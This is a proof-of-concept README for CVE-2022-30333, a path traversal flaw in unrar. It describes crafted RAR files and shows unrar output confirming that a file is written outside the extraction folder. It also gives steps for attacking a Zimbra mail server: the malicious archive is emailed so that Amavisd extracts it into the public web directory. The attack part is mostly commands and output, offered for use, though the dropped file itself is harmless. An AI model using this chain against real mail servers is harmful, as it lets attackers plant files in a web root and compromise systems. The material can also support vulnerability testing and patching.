Awesome

CVE-2022-30333-POC

Sample file to test CVE-2022-30333

• Sample.rar : if you want to test on Linux. When you extract, it create trav in ../../tmp/traversed. Please be sure that directory ../../tmp/traversed exists before extracting Sample.rar

• exp.rar : if you want to test on Zimbra Mail server. When you extract, it create moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. You can access this file at https://zimbra_mail_domain/public/moo.txt

EXPLOITATION STEPS

Testing on Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Testing on Zimbra

• Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
• The moo.txt should be at: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt or https://zimbra_mail_domain/public/moo.txt

REFERENCES

1. Vietnamese blog from DEV2SEC
2. English blog from Sonarsource
3. Special thanks to mrlihd for helping me rebuild attack-chain in Zimbra